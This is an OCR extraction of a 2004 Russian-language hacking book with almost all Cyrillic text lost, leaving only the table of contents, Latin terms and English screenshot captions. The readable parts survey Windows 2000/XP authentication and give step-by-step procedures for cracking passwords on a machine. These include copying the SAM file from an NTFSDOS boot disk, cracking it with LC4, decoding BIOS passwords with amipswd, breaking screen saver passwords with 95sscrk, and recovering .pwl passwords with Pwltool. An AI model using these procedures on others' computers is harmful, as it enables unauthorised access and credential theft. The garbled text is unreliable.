
SNMP Brute

Force Attack

WAN Killer

Security Check

Brutus-AET2

PeepNet

Zombie Zapper

Death n
Destruction 4.0

Invisible
KeyLogger
Stealth

Network Sonat

IP Network
Browser

Alex WebKnacKer

11 U AHTUXAKUHr
100 -.!

004.056.5
Alex WebKnacKer
. : .
. .: , 2004 400 .: .
ISBN 5-93673-025-5
:

! .
100 . -,
.

-
-:

www.3st.ru

ISBN 5-93673-025-5

, 2004
, 2004
..
, 2004


( )

1.

1.

2.

25

3.

36

4. Windows 2000/XP

46

2.

58

5.

58

6.

78

7.

95

3. -

113

8. Web

113

9.

....129

10.

148

11. ICQ

164

4. Web

180

12. Web-

181

13. DoS

209

5. TCP/IP

226

14. Windows 2000/XP

227

15.

242

16.

258

17.

277

18.

286

300
381

1.

XpoHuku
1.

1<
, - ,
, , , . , , . ,
( ).
!!!
, , .. ,
, 2 () .

.
,
:
log:
:
1:
2:
em: e-mail
.
, !
. 13.06.1999, "..
.
!!!
,
http://www.super-internet-provider.ru

1.
, .
, - , , , , , , , . , , ,

Web- .
-
, . - , . ,
, , , ,
.
- ,
, .
- , , , . ,
, !
, , ,
.
, , .
- , 80- , , , , - ,
.
.

Xakepbi u
, ,
, ,
.
,
, , .

.
( !),
.
- (-, !)
, ,
.
, ,
-
,
.
, , ,
, ,
, . , ,
,
, ,
, -
.
,

.
, . , , , , , ,

, .
, , ,
. , - ,
, ,
, .
20-
- .

1.

makoe ?
, , , , ,
, - , -
, ,
(, -
)
, . , - , .
, , .
( ).
, :
(, . ).
, ,
, .
Hard DISK [ Fdisk.exe] n- ( , ) .
! , ,
!
[ 24% ]
, POWER - !
IDE- .
, . , , , - , , , - , HARD DISK
- , - , - , .
, Must die,
.
Windows,
, .

,
, .
, Windows ? ,
, - ? , , , ,
.
, ?
21 ( ).
:
:

, , ,
, ,
. , .
:

, .
. ,
, ,
.
:
. .
, . .
, ,
.
.
: ,
.
, ? -
, , ?
,
?

, - .
, , , , , ...
. , ,
, (, ,
) . , :
- , 16 19 .
( 80%) , nerd.
: 1) , ; 2)
. (, ?
- ).
Windows Unix,
TCP/IP
, , C++, Perl, Basic.
, .
- , - 19- . , ,
, , . , , ,
. ,
, -, , .
, , , .
-
, , , .
, . , ,
- , - .
.
, , , - . ,
. , , .


Takmuka
,
? - , - .
, ,
. , , ,
, , ,
. . ,
, .. . , ,
, ,
, . - .
, , - , '
, , . ,
, ,
, ?

, , - , , ,
.
- , , .
,
, , , ,
. , , , , ?
, , , .

xakepbi ?
, , , ,
, , , .
, , , ,
. , ,
, - , , , , . , .



, ,
, , ,
. -, - - , , , . , ,
, , [2], , ,
, , ( ).
[2] 1991
125 500 , - , ,
.
- ...
-
-. 8, - . , -, Web-
, , .
. - .

.
.
, [2]
WebMoney (http://www.webmoney.ru)
, -,
WebMoney. ,
, WebMoney
?


SecurityLab.ru 23 2002

, Evans Data.
750 ,
12% ,
27%, ..
! , ,
,
.
, ,
,
, ,
, .
, - .

, , . , , , .. , , .
, , , .
, - , - ILOVYOU, ,
,
. , , ,
- . , , ( Yankee Doodle).
, , .
. -
, , , . , 19 ,
N3 2000 .? N5:

, , ,
:). ,
, , ,
, . ,
, :). , ,
. , ,
. , , , :).
, ? - , ,
. , - .
, , ICQ-. ,
? 1 1 , ,
ICQ, . , . ,
,
[3].
DoS (Denial of Services - ), 13?
- Web-,
, Yahoo
(http://www.yahoo.com), , .
, , - ,
(, , )?
, ,
. , -
, , - , , Web- ?
!


-
. -


, , , , . , ,
, ( blackmail - ).
. --... , 19-
(. ) 19.
. [2] Bloomberg LP ,
, 200 000
. - , . -
, ( , ). [2], , ,
, , , ,
.
SecurityLab.ru
(http://www.securitylab.ru). 21 2002 .
28- . , , , ,
, 4 000 .
: ,
...
. SecurityLab.ru
! - .



. , , , - (Stealth)
Lockheed Martin (. [2]), , ,
, . , Lockheed
.


, SecurityLab.ru, -
.
13 2002
43 ! Rafa,
World of Hell ( ).
,
.
, ? SecurityLab.ru. ,
$59' 7
2002 .
Fortune 1000, , . ,
404 . , - 356 . .
(49%) ,
(36%) ,
(27%) - .
- 59 . !


SecurityLab.ru
,
. , , Symantec, , 64%,
2002 . 32 .
. ( SecurityLab.ru) , ,
.
, - ,
, , , .
, , .
-
, ,
. , 2004 .
.
? - , .


xakepbi ?
, , ? -
, , .
( , ) ,. - ,
, , .
, , .
-
, , Windows,
MS Word,
. , , , .
[2] .

- , MS Office Oracle. , , , 11 2002 SecurityLab.ru Oracle 9i ,


Oracle .
- ,
Oracle .
MS Word 6 .

,
. Windows 2000/XP - , . 4,
14 , Windows 2000/XP.
- . SecurityLab.ru 21 2002 Microsoft,
FTP- Microsoft, ZIP-. Wired News,
-

Microsoft. ,
! , , ,
Microsoft - Microsoft! , .
, ,
- (.. ), (..
),
(.. ). , , - , ..
, ,
, . ,
, ,
- , ?

- ,
. - . ,
. , , - , .
, -
; ,
- .
, . , , .
CVE (Common Vulnerabilities and Exposures - )
MITRE. MITRE (http://www.mitre.org) ,
,
,
Web-. CVE.


.
CVE-2002-0055
SMTP service in Microsoft Windows 2000, Windows XP Professional,
and Exchange 2000 to cause a denial of service via a command with a
malformed data transfer (BOAT) request. ( SMTP Microsoft
Windows 2000, Windows XP Professional Exchange 2000

)
Reference: BUGTRAQ:20020306 Vulnerability Details for MS02-012
Reference: MS:MS02-012
Reference: XF:ms-smtp-data-transfer-dos(8307)
Reference: BID:4204

, . , Internet Security Systems (ISS) (http://www.iss.net) - .. ,


. Web-
(, ), - FreeBSD,
Solaris, Windows 2000/XP .
SecurityLab.ru,
,
( , ,
).
, , , , - , - , ! , ! , ! - , - , , .
, ,
, .

Kak xakepbi
, ,
.. , .
, , . , ,

, , .
, ,
,
,
. , , : - .


,
. ,
, , , , ,
[3].
, , , . ,
. , 3
, .

, , , , .
- - , .
- , , , . ,
, ,
.

,
.


.
. , ,
. , , . , - , , [2].
, ,
. , , (, ), ,
,
. - ,
.
, .
.
, -
-, , , Web-.
, , ,
.
, ( , )
, ,
DDoS (Distributed Denial of Services -
). DoS 13 .
- . , , Web-.
,
( - ,
Web). ,

-- ,
,


.
,
9 10 .
-
Web-, - Web- .
, - Web- -
12. , - ,
19 -
. 3 4
.
, . , 14
TCP/IP
Windows 2000/XP.
.
,
. ,
, , .
? - , , , . - , . , - , sniffing - . ,
17 ,
TCP/IP 5 .

, , , ( ,
) . , - ,
, !
-


.
- ,
, . , , , , , ,
, . .
- , [3].
, , , .
, [3]. ,
.
18 PhoneSweep.
- , PhoneSweep
Windows 2000/XP,
.
Login
Hacker, TCH-Scan ToneLock. PhoneSweep -
.
, -
.
,
SecurityLab.ru - , , , . ....
- , , (), . ,
, 50%
, (!!!), , !!! ... - .


Cokpbimue
, ,
, ,
. , . , - , . , , ,
.
,
, (.. ,
). ,
, ,
, , , .
, ,
, , ( rootkit -
). - UNIX,
Windows 2000 , 7,
, , , , Windows, , .
.
IP-,
.
-
.
, - , , -, - ,
.
, 7 -

,
, .


. ,
,
.
-
, ,
, .
-
,
. - .

2.


. , , , - .
- , ?
- , ,
.
, .. .
(., , [2]),
, , , ,
.
, , .
, ,
,
, ,
.
, ..
-
, ,
.
- . .
:
, , , -
(, ). , , IP-,
, .. ,

. , , .


, IP-
, Whols (,
http://www.ripe.net) IP-
, .
IP- ,
, , DoS, .
, DoS,
- , .
, , ,
.
.
.

.


-, , . - , ,
,
... , , , . , ,
. , ,
. , ,
.


, ,
( ) [2].


,
, , .
- , , , , , , , ,


. ,
, , ,
. , ,
, .
, , , . . , . , ,
, ..
- , ( )
.


,
. , , 1 - ,
.
, , .
7.

Honbimka
1,
, ,
. , , , Retina (http://www.retina.com). , , .


. , , , , -


,
( ).

, , - , .

!<6
, DoS.

, .

, , Telnet.
, - , , -...

UcmoMHuku
,
? ,
.
. ,
Windows 2000/XP, ,
, , , , STARR.
. ,
, ,
TCPDump.
. IDS (Intrusion Detection System ). (, Blacklce Defender),
, . ,
IDS
.


CpegcmBa
, , ,
. , ,
. , , .
,
, ,
. :
.
Windows 2000/XP , , FileWatch 1.00
foundstone_tools (http://www.foundstone.com).
. ,
- ,
. , , TCMonitor
The Cleaner (http://www.moosoft.com).
. , Windows 2000/XP , , , . ,
, , RealSecure (http://www.iss.net).
. , , DoS
.
,
IDS, , BlacklCE Defender (http://www.iss.net).
. . , , , .
, , , , TCActive
The Cleaner (http://www.moosoft.com).


.
,
, ,
Attacker 3.0 foundstone_tools (http://www.foundstone.com).
. ,
, , . Windows, , , SOLARWINDS (http://www.solarwinds.com).
,
, . , .
. , ,
,
. ?


,
, . . , , ,
.
,
, -
. - ,
, IDS, , BlacklCE Defender - , , ,
. , ( ).
.
, . , . , .


, , , 24 ,
, , , DoS. ,
, .
,
.
, , - ? ,
. ... , ,
- .


, . , ,
( ),
( ). .


- .
.
, .
,
,
[2].
, 1, ,
- , , .
, . , , , ,
.
,
:


.
[3,4] - ,
, .. ,
. , ,
, , , Windows 2000/XP.
,
. ( , ) ,
.
,
, , , .
. Windows 2000/XP
,
. Windows 2000/XP , - , , -
, Windows 2000/XP [6].
Windows 2000/XP 4.
. . , ,
. ,
, PGP Desktop Security (http://www.pgp.com),
NTFS. ,
- WinRAR, , .
VPN (Virtual Private Network - ), .
IDS. . Windows XP
, . , , WinRouter, ,
IDS, , BlacklCE Defender, . ,
, , Attacker 3.0
foundstone_tools (http://www.foundstone.com).
. , -
, ,
- . -


,
.
Retina.
. . - .
Windows 2000/XP
, ,
.
. ,
, , Norton
Antivirus, MacAfee VirusScan, The Cleaner, .


, ,
, . Microsoft Windows 2000,
- Windows 2000.
- , , .
, (, ), Windows 2000/XP -
( , , , ).
Windows Norton Antivirus
Symantec, IDS BlacklCE Defender -
,
, , . - ,
, (
) , , .
, , .
- - , , ,
. , , .
. ,
IDS 2-1687


.
IP- . , , .
- ,
Web-
IP- ( ) (- ).
,
.

.
, , , , IP-
, , WhoIS,
. (, RIPE NCC
http://www.ripe.net) IP- , . , , .
ISP
-, .
. , , , (., , [5]),
, (, ). , - .
. - , - ,
,
, ,
, ,
, , DoS. , . , ,
DDoSPing UDP Flood foudstonejools, -, DoS, , . - , , 10. ,
.


- ,

- ,
. ,
;
, , -
. , ,
- ,
, ,'
. , , , - .

3.


- ,
- . -
, ,
. ,
DoS ,
IDS.
, . , ,
. ,
, ,
, , , ,
.

.
,
.


, - , , .
, ,
.
1 ,
.
; , .
- ,
, , , , .
, , , . , [3] , -


. ,
, [3] !
[1]. , (
). ,
, , - . , , ,
, ,
. ,
. , - , ,
.
, . , ,
,
. - .


. Web- (, RIPE NCC http://www.ripe.net). Web-, Whols,
, ,
.
, , , Web-. Yahoo
(http://www.yahoo.com), Rambler (http://www.rambler.ru).
. , , , , . , , , [3].
Google
(http://www.google.com),
. , ,
C:\WINNT, Windows NT/2000.


,
.
, , Teleport Pro,
12. ,
Web- ,
. , ,
HTML Web- - ,
, HTTP
. , , , , , , , , (
18 ).
, Web- - ,
, . , .

k
1 , , , . . .
-, , , , ..
, , . - SAM
(Security Account Manager - ), .
SAM - ,
5 ,
, , ,
, , LOphtCrack LC4 (http://www.atstake.com).
-, , , , Windows , MS Office . , .
,

. Office Password 3.5
(http://lastbit.com/download.asp) Windows - , , .
6 Revelation
SnadBoy (http://www.snadboy.com). , ***** - , , -
Revelation .
,
, , , ,
, .
, D , , ,
, , .
-
?
, ,
- , - .

Amaka Web
- . , Web-,
,

-.
, Web, Web-,
Web- ,
. Web- 8 ,
HTML, ,
HTML 4.

,
. , Web-,

. , , ,


Rambler (http://www.rambler.ru) ...


, ,
, ,
, . 9
,
.
. , , 10 Death & Destruction Email Bomber - .
, . - , , ,
10 Brutus.
, , ICQ.
- IP- ICQ-
( flood - )
ICQ- , ! - , 11 ICQ Flooder, ICQ-MultiVar,
.
- , IP- ICQ- ICQ,
, .
, .

Amaka cepOepoB \l\leb


Web- , , , DoS, - . , IIS 5 (Internet Information
Server - ) Microsoft
.
Web- , Web-, -


HTML . 12
, , CGIScan
Brutus, IIS
. 13 ,
DoS.
Web- ,
,
Web-. , DoS
, - , . Web-
, , CGI-. , , .


TCP/IP , ,
, , IP-,
, .
,
.
14 - SuperScan, foundstone_tools
(http://www.foundstone.com).
W2RK (Windows 2000 Resource Kit -
Windows 2000), ,
W2HK (Windows 2000 Hacker Tools - Windows 2000).
TCP/IP Windows
, SNMP (Simple Network Management Protocol - ). 14 , SOLARWINDS
(http://www.solarwinds.com) - IP Network
Browser, SNMP -
SNMP Brute Force Attack SNMP Dictionary Attack. W2RK
SOLARWINDS , W2RK
SNMP .
,
, , .




, , . , ,
-
, .
, . ,
, .
- . , ,
, ,
. 17
- SpyNet,

.
, , , . , ARP (Address Resolution Protocol -
),
. ARP, ,
. -
, . , Windows
Unix, 17 , ,
, .
, , VPN (Virtual Private
Network - ) , , -
. , , , ,
, .



, W2RK (
Windows 2000) W2HK - Windows 2000,
. Windows (Explorer) Windows, . ,
, , password, .
[3], ,
,
, .

, , ,
password.txt , ISP.
, , . , NTFS Windows 2000/XP,
, ,
PGP Desktop Security.

-
- ,
, .. . 1
Web- , (., ,
http://www.securitylab.ru). 12 IIS. CGIScan
, . , - , , IIS 4. Web
, .
- , , . .
, ; , , - ( ). , , - -,
, - .



- ,
. - ,
. 14
NetBUS,
. - , .
- , , ,
.
. - , ,
. , , -
- , ,
... , , .


-
, ,
.

, . , .
- ,
,
.
TEMPEST, . -
, , ,
, .
.


-
, , , , . , , ( ), , ? , , ,
,
?
, - ?
, , ( ),
, , , -
.
, .

. ,
, ,
1, . , ,
.
, ,
,
, .... , , - Windows 2000/XP.

4.

Windows 2000/XP
Windows 2000 TCSEC (Trusted Computer System Evaluation
Criteria - ) .
,
Windows 2000, , .

. .

.
, - ,
, ,
, , .. ,
- .

, ( log in - ), - , . ,
, ,
, .
Windows NT/2000/XP SAM (Security
Account Manager - ). SAM , , . SAM -
, 5
.
, . .
,
, , . ,


, , .
, , , .., , , , . , , -, (,
, ) , , , .
,
, , , . Windows NT 4
NTLM (NT LAN Manager - NT). NTLM
Windows 2000/XP. NTLM,
, LM (LAN Manager - ),
, Windows

NTLM.
Windows 2000/XP Kerberos, , ,
. - Windows 2000/XP, -
Windows 2000 Kerberos.
- ,
Windows 2000/XP - . , ,
, ,
- .

, , , .
- . Windows , , , . ,
, .
, , ,
, ,
.


, Windows NT/2000/XP
.
, . ,
, . , ,
. ,
(Guest),
, - (User),
.
, , ,
. , (Administrators), ,
-
, , ...

,
, .
, , - , 2, .. , .
, , . , , , ,
, .
Windows NT/2000/XP,
, , - .
, 7, ,
, .
,
, , , , , ,
.


,
11 , , .
, , [2], [6],
, -
Windows 2000/XP, ,
.

Kak Windows 2000/XP


Windows 2000/XP SRM
(Security Reference Monitor - ). SRM Windows 2000/XP, .. .
Windows 2000/XP , , SRM. .
LSA (Local Security Authority - ), ,
, LSA.
, LSA . , LSA , .
SAM (Security Account Manager - ), . , LSA.
AD (Active Directory - ),
AD .
,
LSA.
,
, :
, ,
Kerberos; , .
, , , : , , , /,
. SAM AD ,
LSA . ,
, , .. , SRM.


, ,
Windows 2000/XP. ,
. -,
(SAM AD); -, . ,
.

SAM
, , , ,
. , , , SAM AD,
. SAM %_%\58132\\5,
AD - %KOpHeBoii_KaTanor%\ntds\ntds.dit. , ,
, - ! ..
,
, , ,
, Windows 2000/XP. SAM
Windows NT 4 , NTLM , ,
,
LM,
Windows. LM , SAM , , LOphtCrack
(http://www.atstacke.com) ,
.
LOphtCrack
SAM,
, ,
pwdump (http://www.atstacke.com). Windows - pwdump SAM ,
LOphtCrack, - ,
LM - .
Service Pack 3 Windows NT 4, , Syskey
() , SAM.
Windows NT 4 Syskey ; Windows 2000/XP Syskey . LM NTLM Syskey
,

. ,
- ,
3-4 , . ,
1 Microsoft, - Microsoft!
Windows. ,
, .


Wincjows 2000/XP
, , , , ,
? .
, , Windows,
SID (Security
IDentifier), 48- ,
.
Windows 2000/XP SID,
Windows 2000 8.
. ,
, ? (, ..)
Windows ACL (Access Control List -
), (Access Control Entries -
). SID
. ACL
, , (Explorer) Windows, Windows 2000/XP.
ACL.
Windows 2000/XP (, ) LSA , SID SID , .
, ,
SRM 8 ACL , , .


, , - . ,
, - , . , .
- ACL , Windows 2000/XP . , (, NTKap http://www.rootkit.com). ,
ACL !
, - , ? , . ,
, Windows 2000/XP.

kanmoz
Windows NT 4 , ..
, Windows 2000/XP
ADS
(Active Directory Services). ADS Windows 2000,
Windows 2000 Server. , ,
.
- , , ,
, - ADS , , .. . , ,
IP- .
ADS , , - ,
.
OU (Organization Units), ,
, , , , ,
, OU. OU - , .. OU , OU .


Windows 2000/XP
, . , . Windows 2000 , - , Windows 2000 Windows NT. ,
,
.
Windows 2000/XP
, . ,
,
. , .. .
, . , domen.
: com1.domen, comp2.domen...
, ,
, , domenl, domen2,... , ,
.
, domenl domen2 , domen2
domenl, domen2
comp1.domen2.domen1, comp2.domen2.domenl, ... compN.domen2.domenl. A
domenl domen2 , forest,
. ,
domenl compl.domenl.foresi, comp2.domenl.forest
,
domen2

compl. domen2.forest,
comp2.domen2.forest
.
, - ,
:

.
(Universal group), jvioryr , , .


(Global Group),
, ,
.
(Local group domain),
, .
ACL
. -
.
, , AD,
, , .
- AD SAM,
, SAM.
AD , AD, ,
( 10 ), AD , , , . , . ,
, ,
Window 2000, . , , LC4
LOpghtCrack .
, , - - .

Windows 2000
Windows 2000
, . - ,
, -, ,
. -,
D , ,
- . , ,
- ,
.
.


- ,
- , AD. - - ,
- -.
- ,
.

. -,
- . -,
, - ,
, , , .
, , , . . - , , ,
LM, - LM
( , , [3]). Microsoft NTLM ( Service
Pack 3 Windows NT 4) NTLMv2 ( Service Pack 4 Windows NT 4).
, , Windows 2000 Kerberos,
- ,
.
.
, Windows 2000/XP Windows , LM. Windows 2000/XP Kerberos, NTLM LM.
- TCP- 88 , Kerberos, . -
LM
NTLM, LOphtCrack .
, - ,

. , ?


, , ,
.
, ,
.
,
. , , ,
.

,
. , , Windows 2000.
,
Microsoft , ,
. Windows XP

Windows.

Windows 2000/XP [7], . , ,
,
.
, , Retina, [7].
-, . -, , , VPN (Virtual Private
Network - ). VPN ,
. VPN
, .
, , , ,
(Bruce Schneier),
(Applied Cryptography), - .
,
- ,
, .


, .
- , ..
.


Windows 2000/XP , .
SAM, LSA, SRM, ADS, LM, NTLM, Kerberos
.
Windows,
.
Windows 2000/XP, TCP/IP ADS ,
Microsoft Press Windows 2000.

2.


. ,
.
- , ,
.

5.


Window 2000/XP, ,
, , , ? , 2,
,
,
, . . ( ,
- . .)
- ,
. , , ,
( - ...).
, , . , , , ,
, ,
( - ).
? , -

, . - .
, . ,
-
, - . , .
-, , - - , Windows. , ,
,
- ,
.
, , ,
(. 1), -
, . -
, , , - -.
-, , , Windows BIOS . , Windows 2000/XP .


,
- (, ). , , - MS-DOS !
- ,
. -, BIOS , BIOS
. .
-, BIOS ,
NTFS, Windows 2000/XP. , MS-DOS - -
, - .
, -, , ( - - ,
! , . , , ),



Windows 2000/XP. -
NTFSDOS Professional (http://www.winternals.com) Winternals Software LP, NTFS
MS-DOS. ,
, Windows 2000/XP
.
- , . NTFSDOS
Professional - .

NTFSDOS Pro
NTFSDOS Pro . Windows NTFSDOS Professional
NTFSDOS Professional Boot Disk Wizard (
NTFSDOS Professional). ,
NTFS. .
, FORMAT/S SYS
MS-DOS.
Windows XP Create an
MS-DOS startup disk ( MS-DOS).
> * NTFSDOS Professional
(Start * Programs * NTFSDOS Professional). (. 5.1).

his wizard will help you install Windows NT/2000/XP system files needed
by NTFSDOS Professional to run from a MS-DOS diskette or hard disk.

. 5.1. NTFSDOS Pro


> Next ().


(. 5.2),
,
.

NTFSDOS Professional Boot Disk Wizard copies drrvers and system files from an existing Windows
NT/2000<P installation or CD-ROW to your hard disk or a pair of floppy diskettes.
If you wish to create bootable diskettes you must add MS-DOS to the diskettes yourself, either before or
after using this program. Use the FORMAT/S or SYS commands from a MS-DOS shell to make
bootable diskettes.
You can also make a bootable diskette on Windows XP by opening My Computer, selecting the
'Formaf option from the context menu of your diskette drive, and formatting a diskette with the 'Create
an MS-DOS startup disk" option checked.

Puc. 5.2.

> , Next (),
.
NTFSDOS Pro MS DOS
( 437).
(. 5.3) .

ding language information enables NTFSDOS Professional to correctly transla


le names between Unicode and your local character set.
NTFSDOS Pro uses the character set for the United States version of MS-DOS (code page 437) by default.
Select any additional character sets you use with DOS.
Japan, code page 932
Korean (Johab). code page 1361
Korean, code page 949
MS-DOS Canadian-French, code page 863
MS-DOS Icelandic, code page 861
MS-DOS Multilingual (Latin IX code page 850
MS-DOS Nordic, code page 865
MS-DOS Portuguese, code page 860
MS-DOS Slavic (Latin II), code page 852

Cancel

. 5..


> Next ().


NTFSDOS Pro
(. 5.4).

.pecify the name of your Windows NT/2000/XP installation directory, or a directory containing the required
Windows NT/2000/XP system files.
|C\ASFRoot

<Bock

Cancel

Puc. 5.4. Windows


Windows
NT/2000/XP, NTFSDOS Pro. , , C:\W1NNT, \I386
Windows NT/2000/XP, - Service Pack.
> Next ().
NTFSDOS Pro (. 5.5).

Spedfy the disk or directory from which you would like to run NTFSDOS professional. You may
select A: to specify a floppy disk.

Cancel

Puc. 5.5. NTFSDOS Pro


NTFSDOS Pro. MS-DOS,


.. FAT FAT32. :
. Advanced () NTFSDOS Pro , MS-DOS.
> Next ().
NTFSDOS Pro (. 5.6).

nsert . (loppy labelled NTFSDOS Professional Disk 1

Press Next to copy files to A:\.

. 5.6. NTFSDOS Pro


> Next (),
(. 5.7).

nsert efloppy labelled NTFSDOS Professional Disk 1

Copying files to diskette...

Cancel

Puc. 5.7,

(. 5.7) Next
() . Windows XP NTFSPRO.EXE


, NTFS .
Windows NT/2000 . NTFSCHK.EXE,
NTFS.
(. 5.8)
NTFSDOS Professional.

necessary files hove been copied. You mey now reboot to MS-DOS
d begin using NTFSDOS Professional Edition.

Puc. 5.8. NTFSDOS Pro

> Finish (),


.
NTFSDOS Pro, .
NTFSDOS Pro . , ,
NTFSPRO.EXE, NTFS .
, ,
MS-DOS ,
FAT FAT32, NTFSDOS Pro
.
MS-DOS NTFS,
Windows 2000/XP . ,
( - ), , , . , -
, , , . ,
,
, .


- SAM,
, , _/5132/.
SAM, , SAM, . , BIOS ,
. , ,
Setup BIOS (
- ...). ,
BIOS.

BIOS
BIOS ( ),
.
I0"*"!, Setup, BIOS,
.
CMOS. BIOS
Setup BIOS
.
- BIOS ,

. , CMOS , . , CMOS ,
BIOS , , BIOS. (, !). - ,
,
. .
, , (), , ,
CMOS. , , ..
BIOS. , ;
, ?


BIOS - ,
Setup - , , [8], [10].
. Web- - BIOS.
- ,
, ,
BIOS? , -,
, ; .
, . 5.9 amipswd.exe
,
BIOS AMI CMOS . , ! , ...
MS-DOS Prompt

C:\Test>anip<>ud
CMOS AMI DIGS password decipherer v. 2.02
(lulhor: U. ShatOMsky, Tula.
Optimized a added by C c ) PSU-soft, P. Senjanov, St. Petersburg
CMOS password: 007

IE
. 5.9. BIOS !

sacmaBku
, BIOS , . -, BIOS , * , , BIOS
- . ,
, . , ? , , , , .. - , .


, Windows -
. Windows 95/98/NT/2000/XP
, , , , ,
Windows. ScreenLock iJen Software. , -
,
.
, Windows 95/98,
, Windows 95/98 . |[Esc|. TQ
. , Windows 95/98 .
, , , , ..,
. - Windows 95/98,
Windows 95/98 , ,
95sscrk. Windows 95/98
, . 5.10.
5 MS -DOS Prompt

Microsoft(R) Windows ?S
(OCopyright Microsoft Corp 1-1996.

C:M'IINIIOWS>cd ..\test
C:\Test>9Ssscrk
Uin95 Screen Saver Password Cracker ul.1 - Coded by Nobody (nobodyOrngelska.se)
(c) Copyrite 1997 Burnt Toad/ Enterprises - read 95SSCRK.TXT before usage!
No filename in cormand line, using default! (C:\UINOOUS\USER.DftT)
Raw registry file detected, ripping out strings
Scanning strings for password key...
Found password data! Decrypting ... Password is 007!
Cracking complete! Enjoy the passwords!

Puc. 5.10. !
-


, Windows Windows. CD-ROM


-, , ,
, Autorun.ini, Windows 95/98 ( Windows 2000/XP).
( ScreenLock) - Windows.
, - , Autorun.ini, CD-ROM
. , , ( ),
- . - - , !
...
, SSBypass (http://www.amecisco.com), , , Windows 95/98
. SSBypass $40,
. ,
- , Windows.


, , , . ,
, , (. 1) - ,
,
( -!), ... , ,
Web-.
, , , , . - .
Windows 95/98
,
. Windows NT/2000/XP ,
.


4, -
SAM , . , .

SAM
SAM, SAM.
NTFSDOS Pro,
MS-DOS SAM
/_/132/ .
- , , LC4 - LOphtCrack
(http://www.atstake.com).
. 5.11 LC4 Import
().
, LC4
, . SAM :
> File * New Session ( ). , . 5.11.

[Screenshot: LC4 Import menu with the items Import From Local Machine, Import From Remote Registry..., Import From SAM File..., Import From Sniffer..., Import From .LC File..., Import From .LCS (LC3) File and Import From PWDUMP File...; hint text: "Use the Import menu to retrieve accounts to audit."]

. 5.11. LC4
Import * Import From SAM File ( *
SAM). SAM.


SAM, 1-3.
(. 5.12) Session * Begin Audit
( * ) .
[Screenshot: @stake LC4 window (menus File, View, Import, Session, Help) with the columns Domain, User Name and NTLM Password, listing the accounts Administrator, ASPNET, Guest, HelpAssistant, IUSR_ALEX-3, IWAM_ALEX-3 and NewUser; status line: "Imported 7 accounts"]

. 5.12. SAM
, , SAM, . , . 5.13, SAM.
[Screenshot: @stake LC4 window listing the accounts of the machine ALEX-3 (Administrator, ASPNET, Guest, HelpAssistant, IUSR_ALEX-3, IWAM_ALEX-3, NewUser); the status area names the dictionary file words-english.dic]

Puc. 5.13. SAM !


, - 007 , , .
, , 5
Pentium 2 400 . - , LC4
.
LC4 Auditing
Options For This Session ( ), . 5.14.
Auditing Options Foi This Session
Dictionary Crack Enabled

Dictionary List

The Dictionary Crack tests for passwords that are the same as the words listed in the
word file. This test is very fast and finds the weakest passwords.
Dictionary/Brute Hybrid Crack0

Enabled

Characters to prepend
^1 Characters to append
Common letter substitutions (much slower)

The Dictionary/Brute Hybrid Crack tests for passwords that are variations of the words in
the word file. It finds passwords such as "Dana99" or "monkeys!". This test is fast and
finds weak passwords.
Brute Force Crack0

Character Set:

Enabled

|A-ZandQ-9

Distributed
Part

1 Of L_

Custom Chatacttt SeUfel each ehauctwfc

The Brute Force Crack tests for passwords that are made up of the characters specified
in the Character Set. It finds passwords such as 'WeR3pH6s" or "vC5%S9+12b". This
test is slow and finds medium to strong passwords. Specify a character set with more
characters to crack stronger passwords.

Cancel

Puc. 5.14.
, LC4 :
Dictionary Crack ( ), Dictionary
List ( ), . LC4
, ,
. ,
, , , ,
.., .


Dictionary/Brute Hybrid Crack (/ ),


, / ,
, .
Password???, .
Brute Force Crack ( ), .
,
. Character Set ( ) ,
Custom (), Custom
Character Set (List each character) ( ( )) .
Distributed ()
. File Save
Distributed ( )
.
LC4
Windows NT/2000/XP.
Windows,
Windows 95/98, Pwltool.

.pwl
Windows 9x/Me .pwl, Windows.
,
, , - Pwltool (http://soft4you.com) (Vitas
Ramanchauskas) (Eugene Korolev).
, Windows 9x/Me,
? , .pwl , , ,
NetWare,
Windows, , .
, Pwltool - .
Pwltool RePWL, * * PwlTool Demo * Repwl (Start Programs
PwlTool Demo * Repwl). RePWL
. 5.15.


[Screenshot: Repwl (version 6.5, Demo) main window: PWL File field (E:\WINDOWS\ALEX.PWL) with Browse, Cached passwords, User name (ALEX), Password with CheckPass; tabs Brute force, SmartForce and Dictionary; buttons SearchPasswordFast, SearchPassword, CheckPassFast and Client/Server; Zombie mode checkbox; Help and Adv buttons]

. 5.15. Repwl
Pwltool.
Cached passwords ( )
Windows
, - . .pwl,
Browse (), (
Windows /Me
).
.pwl ,
PWL File ( PWL). , Net Name ( ). Browse () Local Net Share's resources (
), . 5.16.

[Screenshot: "Local Net Share's resources" dialog with the columns Provider, Type, RemoteName and Speed (kb/s), listing the disk shares of \\SWORD-2000 (My Documents, NETLOGON, D, scripts, Update, Test, My Downloads, SYSVOL) and the server \\SWORD-2000 itself; buttons Scan, Filter, Connect and Get]

. 5.16. .pwl


, . Scan ()
. Filter ()
, Connect
() ,
Get () - .
User name ( ) Repwl (. 5.15)
.

, . Windows 95
Windows 3.1, Glide () .pwl . - .pwl Windows.
- , , , Password () ,
CheckPass ( ) - , . 5.17
.
User name: ALEX
Password found: 007
File: E:\WINDOWS\ALEX.PWL
User name: 'ALEX1
Password: '007'

Save As

Print

To clipboard

Cached passwords:

Puc. 5.17. 007 !


.pwl , , .pwl. Pwltool , . Brute force
( ), .
Password length: From ... ... ( : ... ...)
, ,
. Charset


String ( ). SearchPassword ( )
,
(. 5.18).
[Screenshot: "Password searching" window for E:\WINDOWS\ALEX.PWL: Number of cached passwords: 0; AutoSave every 10 minutes; Current speed: 0; Total variants: 1679616; Variants found: 0]

Puc. 5.18.
, , . 5.17,
.
SmartForce ( ) Repwl (. 5.15) -
,
. , , , ,
, sdyicorljn. , ,
...
, , Dictionary () ,
. - ,
, , . , , , , , ,
.. - .
Repwl ,
.
Client/Server (/), .
Pwltool pwlclnt, Repwl.
, .
- ,
Adv (). Adv () Advanced features ( ),
. 5.19, .


[Screenshot: Repwl "Advanced features" dialog with the tabs Variator, RAS info, Shared Res., Mail, PStorage, Other and More...; the "Outlook Express accounts' list" shows POP3 Server Name 'sword-2000.sword.net', POP3 User Name 'petia', Real User Name 'Petia', E-mail address 'petia@sword-2000.sword.net', SMTP Server 'sword-2000.sword.net' and SMTP User Name 'petia'; the POP3 and SMTP passwords read "Not implemented in demo version"]

. 5.19. Repwl

Advanced features ( ) . 5.19,
Pwltool ,
( Mail), Windows (
PStorage), ( RAS Info),
( Other),
.
, , ,
Windows 9x/Me.
- , Windows 2000/XP , , .
!


, BIOS,
. , . , ,
